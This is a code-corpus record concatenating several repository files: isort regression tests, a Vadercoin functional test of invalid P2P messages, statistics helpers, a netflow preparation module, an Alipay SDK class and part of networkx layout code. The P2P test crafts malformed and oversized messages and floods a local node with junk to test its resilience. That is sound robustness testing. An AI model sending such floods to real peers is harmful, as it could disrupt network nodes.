2022-03-30T13:46:48.000Z
|
"""Tests projects that use isort to see if any differences are found between
their current imports and what isort suggest on the develop branch.
This is an important early warning signal of regressions.
NOTE: If you use isort within a public repository, please feel empowered to add your project here!
It is important to isort that as few regressions as possible are experienced by our users.
Having your project tested here is the most sure way to keep those regressions form ever happening.
"""
from pathlib import Path
from subprocess import check_call
from typing import Sequence
from isort.main import main
def git_clone(repository_url: str, directory: Path):
"""Clones the given repository into the given directory path"""
check_call(["git", "clone", "--depth", "1", repository_url, str(directory)])
def run_isort(arguments: Sequence[str]):
"""Runs isort in diff and check mode with the given arguments"""
main(["--check-only", "--diff", *arguments])
def test_django(tmpdir):
git_clone("https://github.com/django/django.git", tmpdir)
run_isort(
str(target_dir) for target_dir in (tmpdir / "django", tmpdir / "tests", tmpdir / "scripts")
)
def test_plone(tmpdir):
git_clone("https://github.com/plone/plone.app.multilingualindexes.git", tmpdir)
run_isort([str(tmpdir / "src"), "--skip", "languagefallback.py"])
def test_pandas(tmpdir):
# Need to limit extensions as isort has just made sorting pxd the default, and pandas
# will have not picked it up yet
# TODO: Remove below line as soon as these files are sorted on the mainline pandas project
git_clone("https://github.com/pandas-dev/pandas.git", tmpdir)
limit_extensions = ("--ext", "py", "--ext", "pyi", "--ext", "pyx")
run_isort((str(tmpdir / "pandas"), "--skip", "__init__.py", *limit_extensions))
def test_fastapi(tmpdir):
git_clone("https://github.com/tiangolo/fastapi.git", tmpdir)
run_isort([str(tmpdir / "fastapi")])
def test_zulip(tmpdir):
git_clone("https://github.com/zulip/zulip.git", tmpdir)
run_isort((str(tmpdir), "--skip", "__init__.pyi"))
def test_habitat_lab(tmpdir):
git_clone("https://github.com/facebookresearch/habitat-lab.git", tmpdir)
run_isort([str(tmpdir)])
def test_tmuxp(tmpdir):
git_clone("https://github.com/tmux-python/tmuxp.git", tmpdir)
run_isort(
[
str(tmpdir),
"--skip",
"cli.py",
"--skip",
"test_workspacebuilder.py",
"--skip",
"test_cli.py",
"--skip",
"workspacebuilder.py",
]
)
def test_websockets(tmpdir):
git_clone("https://github.com/aaugustin/websockets.git", tmpdir)
run_isort((str(tmpdir), "--skip", "example", "--skip", "docs", "--skip", "compliance"))
def test_airflow(tmpdir):
git_clone("https://github.com/apache/airflow.git", tmpdir)
run_isort([str(tmpdir), "--skip-glob", "*/_vendor/*", "--skip", "tests"])
def test_typeshed(tmpdir):
git_clone("https://github.com/python/typeshed.git", tmpdir)
run_isort(
(
str(tmpdir),
"--skip",
"tests",
"--skip",
"scripts",
"--skip",
f"{tmpdir}/third_party/2and3/yaml/__init__.pyi",
"--skip",
"builtins.pyi",
"--skip",
"ast.pyi",
)
)
def test_pylint(tmpdir):
git_clone("https://github.com/PyCQA/pylint.git", tmpdir)
run_isort([str(tmpdir)])
def test_poetry(tmpdir):
git_clone("https://github.com/python-poetry/poetry.git", tmpdir)
run_isort((str(tmpdir), "--skip", "tests"))
def test_hypothesis(tmpdir):
git_clone("https://github.com/HypothesisWorks/hypothesis.git", tmpdir)
run_isort(
(str(tmpdir), "--skip", "tests", "--profile", "black", "--ca", "--project", "hypothesis")
)
def test_pillow(tmpdir):
git_clone("https://github.com/python-pillow/Pillow.git", tmpdir)
run_isort((str(tmpdir), "--skip", "tests"))
def test_attrs(tmpdir):
git_clone("https://github.com/python-attrs/attrs.git", tmpdir)
run_isort(
(
str(tmpdir),
"--skip",
"tests",
"--ext",
"py",
"--skip",
"_compat.py",
)
)
def test_datadog_integrations_core(tmpdir):
git_clone("https://github.com/DataDog/integrations-core.git", tmpdir)
run_isort([str(tmpdir), "--skip", "docs"])
def test_pyramid(tmpdir):
git_clone("https://github.com/Pylons/pyramid.git", tmpdir)
run_isort(
str(target_dir)
for target_dir in (tmpdir / "src" / "pyramid", tmpdir / "tests", tmpdir / "setup.py")
)
def test_products_zopetree(tmpdir):
git_clone("https://github.com/jugmac00/Products.ZopeTree.git", tmpdir)
run_isort([str(tmpdir)])
def test_dobby(tmpdir):
git_clone("https://github.com/rocketDuck/dobby.git", tmpdir)
run_isort([str(tmpdir / "tests"), str(tmpdir / "src")])
def test_zope(tmpdir):
git_clone("https://github.com/zopefoundation/Zope.git", tmpdir)
run_isort([str(tmpdir)])
| 30.052632
| 99
| 0.633975
|
6be021deeb98a11d711efe58911ce4703d52e282
| 11,348
|
py
|
Python
|
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test node responses to invalid network messages."""
import struct
import time
from test_framework.messages import (
CBlockHeader,
CInv,
MAX_HEADERS_RESULTS,
MAX_INV_SIZE,
MAX_PROTOCOL_MESSAGE_LENGTH,
msg_getdata,
msg_headers,
msg_inv,
msg_ping,
MSG_TX,
msg_version,
ser_string,
)
from test_framework.p2p import (
P2PDataStore,
P2PInterface,
)
from test_framework.test_framework import VadercoinTestFramework
from test_framework.util import (
assert_equal,
hex_str_to_bytes,
)
VALID_DATA_LIMIT = MAX_PROTOCOL_MESSAGE_LENGTH - 5 # Account for the 5-byte length prefix
class msg_unrecognized:
"""Nonsensical message. Modeled after similar types in test_framework.messages."""
msgtype = b'badmsg\x01'
def __init__(self, *, str_data):
self.str_data = str_data.encode() if not isinstance(str_data, bytes) else str_data
def serialize(self):
return ser_string(self.str_data)
def __repr__(self):
return "{}(data={})".format(self.msgtype, self.str_data)
class SenderOfAddrV2(P2PInterface):
def wait_for_sendaddrv2(self):
self.wait_until(lambda: 'sendaddrv2' in self.last_message)
class InvalidMessagesTest(VadercoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [["-whitelist=addr@127.0.0.1"]]
def run_test(self):
self.test_buffer()
self.test_duplicate_version_msg()
self.test_magic_bytes()
self.test_checksum()
self.test_size()
self.test_msgtype()
self.test_addrv2_empty()
self.test_addrv2_no_addresses()
self.test_addrv2_too_long_address()
self.test_addrv2_unrecognized_network()
self.test_oversized_inv_msg()
self.test_oversized_getdata_msg()
self.test_oversized_headers_msg()
self.test_resource_exhaustion()
def test_buffer(self):
self.log.info("Test message with header split across two buffers is received")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
# Create valid message
msg = conn.build_message(msg_ping(nonce=12345))
cut_pos = 12 # Chosen at an arbitrary position within the header
# Send message in two pieces
before = self.nodes[0].getnettotals()['totalbytesrecv']
conn.send_raw_message(msg[:cut_pos])
# Wait until node has processed the first half of the message
self.wait_until(lambda: self.nodes[0].getnettotals()['totalbytesrecv'] != before)
middle = self.nodes[0].getnettotals()['totalbytesrecv']
# If this assert fails, we've hit an unlikely race
# where the test framework sent a message in between the two halves
assert_equal(middle, before + cut_pos)
conn.send_raw_message(msg[cut_pos:])
conn.sync_with_ping(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_duplicate_version_msg(self):
self.log.info("Test duplicate version message is ignored")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['redundant version message from peer']):
conn.send_and_ping(msg_version())
self.nodes[0].disconnect_p2ps()
def test_magic_bytes(self):
self.log.info("Test message with invalid magic bytes disconnects peer")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Wrong MessageStart ffffffff received']):
msg = conn.build_message(msg_unrecognized(str_data="d"))
# modify magic bytes
msg = b'\xff' * 4 + msg[4:]
conn.send_raw_message(msg)
conn.wait_for_disconnect(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_checksum(self):
self.log.info("Test message with invalid checksum logs an error")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Wrong checksum (badmsg, 2 bytes), expected 78df0a04 was ffffffff']):
msg = conn.build_message(msg_unrecognized(str_data="d"))
# Checksum is after start bytes (4B), message type (12B), len (4B)
cut_len = 4 + 12 + 4
# modify checksum
msg = msg[:cut_len] + b'\xff' * 4 + msg[cut_len + 4:]
conn.send_raw_message(msg)
conn.sync_with_ping(timeout=1)
# Check that traffic is accounted for (24 bytes header + 2 bytes payload)
assert_equal(self.nodes[0].getpeerinfo()[0]['bytesrecv_per_msg']['*other*'], 26)
self.nodes[0].disconnect_p2ps()
def test_size(self):
self.log.info("Test message with oversized payload disconnects peer")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Size too large (badmsg, 33554433 bytes)']):
msg = msg_unrecognized(str_data="d" * (VALID_DATA_LIMIT + 1))
msg = conn.build_message(msg)
conn.send_raw_message(msg)
conn.wait_for_disconnect(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_msgtype(self):
self.log.info("Test message with invalid message type logs an error")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Invalid message type']):
msg = msg_unrecognized(str_data="d")
msg = conn.build_message(msg)
# Modify msgtype
msg = msg[:7] + b'\x00' + msg[7 + 1:]
conn.send_raw_message(msg)
conn.sync_with_ping(timeout=1)
# Check that traffic is accounted for (24 bytes header + 2 bytes payload)
assert_equal(self.nodes[0].getpeerinfo()[0]['bytesrecv_per_msg']['*other*'], 26)
self.nodes[0].disconnect_p2ps()
def test_addrv2(self, label, required_log_messages, raw_addrv2):
node = self.nodes[0]
conn = node.add_p2p_connection(SenderOfAddrV2())
# Make sure vadercoind signals support for ADDRv2, otherwise this test
# will bombard an old node with messages it does not recognize which
# will produce unexpected results.
conn.wait_for_sendaddrv2()
self.log.info('Test addrv2: ' + label)
msg = msg_unrecognized(str_data=b'')
msg.msgtype = b'addrv2'
with node.assert_debug_log(required_log_messages):
# override serialize() which would include the length of the data
msg.serialize = lambda: raw_addrv2
conn.send_raw_message(conn.build_message(msg))
conn.sync_with_ping()
node.disconnect_p2ps()
def test_addrv2_empty(self):
self.test_addrv2('empty',
[
'received: addrv2 (0 bytes)',
'ProcessMessages(addrv2, 0 bytes): Exception',
'end of data',
],
b'')
def test_addrv2_no_addresses(self):
self.test_addrv2('no addresses',
[
'received: addrv2 (1 bytes)',
],
hex_str_to_bytes('00'))
def test_addrv2_too_long_address(self):
self.test_addrv2('too long address',
[
'received: addrv2 (525 bytes)',
'ProcessMessages(addrv2, 525 bytes): Exception',
'Address too long: 513 > 512',
],
hex_str_to_bytes(
'01' + # number of entries
'61bc6649' + # time, Fri Jan 9 02:54:25 UTC 2009
'00' + # service flags, COMPACTSIZE(NODE_NONE)
'01' + # network type (IPv4)
'fd0102' + # address length (COMPACTSIZE(513))
'ab' * 513 + # address
'208d')) # port
def test_addrv2_unrecognized_network(self):
now_hex = struct.pack('<I', int(time.time())).hex()
self.test_addrv2('unrecognized network',
[
'received: addrv2 (25 bytes)',
'IP 9.9.9.9 mapped',
'Added 1 addresses',
],
hex_str_to_bytes(
'02' + # number of entries
# this should be ignored without impeding acceptance of subsequent ones
now_hex + # time
'01' + # service flags, COMPACTSIZE(NODE_NETWORK)
'99' + # network type (unrecognized)
'02' + # address length (COMPACTSIZE(2))
'ab' * 2 + # address
'208d' + # port
# this should be added:
now_hex + # time
'01' + # service flags, COMPACTSIZE(NODE_NETWORK)
'01' + # network type (IPv4)
'04' + # address length (COMPACTSIZE(4))
'09' * 4 + # address
'208d')) # port
def test_oversized_msg(self, msg, size):
msg_type = msg.msgtype.decode('ascii')
self.log.info("Test {} message of size {} is logged as misbehaving".format(msg_type, size))
with self.nodes[0].assert_debug_log(['Misbehaving', '{} message size = {}'.format(msg_type, size)]):
self.nodes[0].add_p2p_connection(P2PInterface()).send_and_ping(msg)
self.nodes[0].disconnect_p2ps()
def test_oversized_inv_msg(self):
size = MAX_INV_SIZE + 1
self.test_oversized_msg(msg_inv([CInv(MSG_TX, 1)] * size), size)
def test_oversized_getdata_msg(self):
size = MAX_INV_SIZE + 1
self.test_oversized_msg(msg_getdata([CInv(MSG_TX, 1)] * size), size)
def test_oversized_headers_msg(self):
size = MAX_HEADERS_RESULTS + 1
self.test_oversized_msg(msg_headers([CBlockHeader()] * size), size)
def test_resource_exhaustion(self):
self.log.info("Test node stays up despite many large junk messages")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
conn2 = self.nodes[0].add_p2p_connection(P2PDataStore())
msg_at_size = msg_unrecognized(str_data="b" * VALID_DATA_LIMIT)
assert len(msg_at_size.serialize()) == MAX_PROTOCOL_MESSAGE_LENGTH
self.log.info("(a) Send 80 messages, each of maximum valid data size (4MB)")
for _ in range(80):
conn.send_message(msg_at_size)
# Check that, even though the node is being hammered by nonsense from one
# connection, it can still service other peers in a timely way.
self.log.info("(b) Check node still services peers in a timely way")
for _ in range(20):
conn2.sync_with_ping(timeout=2)
self.log.info("(c) Wait for node to drop junk messages, while remaining connected")
conn.sync_with_ping(timeout=400)
# Despite being served up a bunch of nonsense, the peers should still be connected.
assert conn.is_connected
assert conn2.is_connected
self.nodes[0].disconnect_p2ps()
if __name__ == '__main__':
InvalidMessagesTest().main()
| 40.528571
| 128
| 0.626895
|
43d623dba085ff8fa0c6a50c9ff32fdeff4a41b4
| 1,976
|
py
|
Python
|
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | 2
|
2020-07-28T10:47:40.000Z
|
2021-11-14T20:07:21.000Z
|
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | null | null | null |
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import scipy.optimize
from .config import *
def powerlaw(size=1, xmin=1.0, alpha=2.0):
""" Draw examples from a discrete power-law.
Uses an approximate transformation technique, see Eq. D6 in Clauset et al. arXiv 0706.1062v2 for details.
"""
r = np.random.rand(int(size))
return np.floor((xmin - 0.5)*(1.0-r)**(-1.0/(alpha-1.0)) + 0.5)
def mle_alpha(c, cmin=1.0, continuitycorrection=True):
"""Maximum likelihood estimate of the power-law exponent.
see Eq. B17 in Clauset et al. arXiv 0706.1062v2
"""
c = np.asarray(c)
c = c[c>=cmin]
if continuitycorrection:
return 1.0 + len(c)/np.sum(np.log(c/(cmin-0.5)))
return 1.0 + len(c)/np.sum(np.log(c/cmin))
def discrete_loglikelihood(x, alpha, xmin):
x = x[x>=xmin]
n = len(x)
return -n*np.log(scipy.special.zeta(alpha, xmin)) - alpha*np.sum(np.log(x))
def mle_alpha_discrete(c, cmin=1.0, **kwargs):
"""Maximum likelihood estimate of the power-law exponent for discrete data.
Numerically maximizes the discrete loglikelihood.
kwargs are passed to scipy.optimize.minimize_scalar.
Default kwargs: bounds=[1.5, 4.5], method='bounded'
"""
optkwargs = dict(bounds=[1.5, 4.5], method='bounded')
optkwargs.update(kwargs)
c = np.asarray(c)
c = c[c>=cmin]
result = scipy.optimize.minimize_scalar(lambda alpha: -discrete_loglikelihood(c, alpha, cmin), **optkwargs)
if not result.success:
raise Exception('fitting failed')
return result.x
@np.vectorize
def naive_percentage(t):
naivefit = pd.read_csv(data_directory + 'naive_fit.csv', index_col=0, header=None)
intercept, slope = float(naivefit.loc['intercept']), float(naivefit.loc['slope'])
intercept_early, slope_early = float(naivefit.loc['intercept_early']), float(naivefit.loc['slope_early'])
if t < 5:
return intercept_early*np.exp(slope_early*t)
return intercept*np.exp(slope*t)
| 35.285714
| 111
| 0.674595
|
68d4e3555174c23ca28c826baa7e80dc668ca84e
| 3,837
|
py
|
Python
|
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
'''
Methods that will be used to process and prepare netflow data, before being sent to
Kafka cluster.
'''
import logging
import re
import sys
import tempfile
from datetime import datetime
from ..utils import popen
COMMAND = 'nfdump -r {0} -o csv {1} > {2}'
EPOCH = datetime(1970, 1, 1)
def convert(netflow, tmpdir, opts='', prefix=None):
'''
Convert `nfcapd` file to a comma-separated output format.
:param netflow : Path of binary file.
:param tmpdir : Path of local staging area.
:param opts : A set of options for `nfdump` command.
:param prefix : If `prefix` is specified, the file name will begin with that;
otherwise, a default `prefix` is used.
:returns : Path of CSV-converted file.
:rtype : ``str``
:raises OSError: If an error occurs while executing the `nfdump` command.
'''
logger = logging.getLogger('SHIELD.DC.PROCESS.FLOW')
with tempfile.NamedTemporaryFile(prefix=prefix, dir=tmpdir, delete=False) as fp:
command = COMMAND.format(netflow, opts, fp.name)
popen(command, raises=True)
return fp.name
def prepare(csvfile, max_req_size):
'''
Prepare text-formatted data for transmission through the Kafka cluster.
This method takes a CSV file and groups it into segments, according to the
pattern '%Y%m%d%h'. If the size of each segment is greater than the maximum size
of a request, then divides each segment into smaller ones so that they can be
transmitted.
:param csvfile : Path of CSV-converted file; result of `convert` method.
:param max_req_size: The maximum size of a request.
:returns : A generator which yields the timestamp (in milliseconds) and a
list of lines from the CSV-converted file.
:rtype : :class:`types.GeneratorType`
:raises IOError : If the given file has no any valid line.
'''
msg_list = []
msg_size = segmentid = 0
logger = logging.getLogger('SHIELD.DC.PROCESS.FLOW')
partition = timestamp = None
pattern = re.compile('[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}')
with open(csvfile, 'r') as fp:
for line in fp:
value = line.strip()
if not value: continue
match = pattern.search(value.split(',')[0])
if not match: continue
size = sys.getsizeof(value)
# .........................assume the first 13 characters of the `search`
# result as the `partition`, e.g. '2018-03-20 09'
if match.group()[:13] == partition and (msg_size + size) < max_req_size:
msg_list.append(value)
msg_size += size
continue
# .........................if the hour is different or the message size is
# above the maximum, then yield existing list and continue with an empty one
if timestamp:
logger.debug('Yield segment-{0}: {1} lines, {2} bytes'.format(segmentid,
len(msg_list), msg_size))
segmentid += 1
yield (int(timestamp.total_seconds() * 1000), msg_list)
msg_list = [value]
msg_size = size
partition = match.group()[:13]
timestamp = datetime.strptime(match.group(), '%Y-%m-%d %H:%M:%S') - EPOCH
# .................................send the last lines from the file. The check of
# `timestamp` is in case the file is empty and `timestamp` is still ``None``
if not timestamp:
raise IOError('CSV-converted file has no valid lines.')
logger.debug('Yield segment-{0}: {1} lines, {2} bytes'.format(segmentid,
len(msg_list), msg_size))
yield (int(timestamp.total_seconds() * 1000), msg_list)
| 38.757576
| 88
| 0.597081
|
6831af1816c8543b9ce6249e514baab59ffdc2e8
| 4,015
|
py
|
Python
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiServindustryExercisePlanDeleteModel import KoubeiServindustryExercisePlanDeleteModel
class KoubeiServindustryExercisePlanDeleteRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, KoubeiServindustryExercisePlanDeleteModel):
self._biz_content = value
else:
self._biz_content = KoubeiServindustryExercisePlanDeleteModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'koubei.servindustry.exercise.plan.delete'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.689655
| 148
| 0.648568
|
8018ff577238d94d12fa01209b3fb367d2e674b4
| 33,281
|
py
|
Python
|
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (C) 2004-2019 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# Richard Penney <rwpenney@users.sourceforge.net>
# Michael Fedell <mfedell@jpl.nasa.gov>
# Valentino Constantinou <vconstan@jpl.nasa.gov>
# All rights reserved.
# BSD license.
#
# Authors: Aric Hagberg <aric.hagberg@gmail.com>,
# Dan Schult <dschult@colgate.edu>
"""
******
Layout
******
Node positioning algorithms for graph drawing.
For `random_layout()` the possible resulting shape
is a square of side [0, scale] (default: [0, 1])
Changing `center` shifts the layout by that amount.
For the other layout routines, the extent is
[center - scale, center + scale] (default: [-1, 1]).
Warning: Most layout routines have only been tested in 2-dimensions.
"""
import networkx as nx
from networkx.utils import random_state
__all__ = ['bipartite_layout',
'circular_layout',
'kamada_kawai_layout',
'random_layout',
'rescale_layout',
'shell_layout',
'spring_layout',
'spectral_layout',
'planar_layout',
'fruchterman_reingold_layout',
'spiral_layout']
def _process_params(G, center, dim):
# Some boilerplate code.
import numpy as np
if not isinstance(G, nx.Graph):
empty_graph = nx.Graph()
empty_graph.add_nodes_from(G)
G = empty_graph
if center is None:
center = np.zeros(dim)
else:
center = np.asarray(center)
if len(center) != dim:
msg = "length of center coordinates must match dimension of layout"
raise ValueError(msg)
return G, center
@random_state(3)
def random_layout(G, center=None, dim=2, seed=None):
"""Position nodes uniformly at random in the unit square.
For every node, a position is generated by choosing each of dim
coordinates uniformly at random on the interval [0.0, 1.0).
NumPy (http://scipy.org) is required for this function.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
seed : int, RandomState instance or None optional (default=None)
Set the random state for deterministic node layouts.
If int, `seed` is the seed used by the random number generator,
if numpy.random.RandomState instance, `seed` is the random
number generator,
if None, the random number generator is the RandomState instance used
by numpy.random.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.lollipop_graph(4, 3)
>>> pos = nx.random_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
pos = seed.rand(len(G), dim) + center
pos = pos.astype(np.float32)
pos = dict(zip(G, pos))
return pos
def circular_layout(G, scale=1, center=None, dim=2):
# dim=2 only
"""Position nodes on a circle.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
If dim>2, the remaining dimensions are set to zero
in the returned positions.
If dim<2, a ValueError is raised.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim < 2
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.circular_layout(G)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
if dim < 2:
raise ValueError('cannot handle dimensions < 2')
G, center = _process_params(G, center, dim)
paddims = max(0, (dim - 2))
if len(G) == 0:
pos = {}
elif len(G) == 1:
pos = {nx.utils.arbitrary_element(G): center}
else:
# Discard the extra angle since it matches 0 radians.
theta = np.linspace(0, 1, len(G) + 1)[:-1] * 2 * np.pi
theta = theta.astype(np.float32)
pos = np.column_stack([np.cos(theta), np.sin(theta),
np.zeros((len(G), paddims))])
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
def shell_layout(G, nlist=None, scale=1, center=None, dim=2):
"""Position nodes in concentric circles.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
nlist : list of lists
List of node lists for each shell.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout, currently only dim=2 is supported.
Other dimension values result in a ValueError.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim != 2
Examples
--------
>>> G = nx.path_graph(4)
>>> shells = [[0], [1, 2, 3]]
>>> pos = nx.shell_layout(G, shells)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G): center}
if nlist is None:
# draw the whole graph in one shell
nlist = [list(G)]
if len(nlist[0]) == 1:
# single node at center
radius = 0.0
else:
# else start at r=1
radius = 1.0
npos = {}
for nodes in nlist:
# Discard the extra angle since it matches 0 radians.
theta = np.linspace(0, 1, len(nodes) + 1)[:-1] * 2 * np.pi
theta = theta.astype(np.float32)
pos = np.column_stack([np.cos(theta), np.sin(theta)])
if len(pos) > 1:
pos = rescale_layout(pos, scale=scale * radius / len(nlist)) + center
else:
pos = np.array([(scale * radius + center[0], center[1])])
npos.update(zip(nodes, pos))
radius += 1.0
return npos
def bipartite_layout(G, nodes, align='vertical',
scale=1, center=None, aspect_ratio=4/3):
"""Position nodes in two straight lines.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
nodes : list or container
Nodes in one node set of the bipartite graph.
This set will be placed on left or top.
align : string (default='vertical')
The alignment of nodes. Vertical or horizontal.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
aspect_ratio : number (default=4/3):
The ratio of the width to the height of the layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node.
Examples
--------
>>> G = nx.bipartite.gnmk_random_graph(3, 5, 10, seed=123)
>>> top = nx.bipartite.sets(G)[0]
>>> pos = nx.bipartite_layout(G, top)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
G, center = _process_params(G, center=center, dim=2)
if len(G) == 0:
return {}
height = 1
width = aspect_ratio * height
offset = (width/2, height/2)
top = set(nodes)
bottom = set(G) - top
nodes = list(top) + list(bottom)
if align == 'vertical':
left_xs = np.repeat(0, len(top))
right_xs = np.repeat(width, len(bottom))
left_ys = np.linspace(0, height, len(top))
right_ys = np.linspace(0, height, len(bottom))
top_pos = np.column_stack([left_xs, left_ys]) - offset
bottom_pos = np.column_stack([right_xs, right_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
pos = rescale_layout(pos, scale=scale) + center
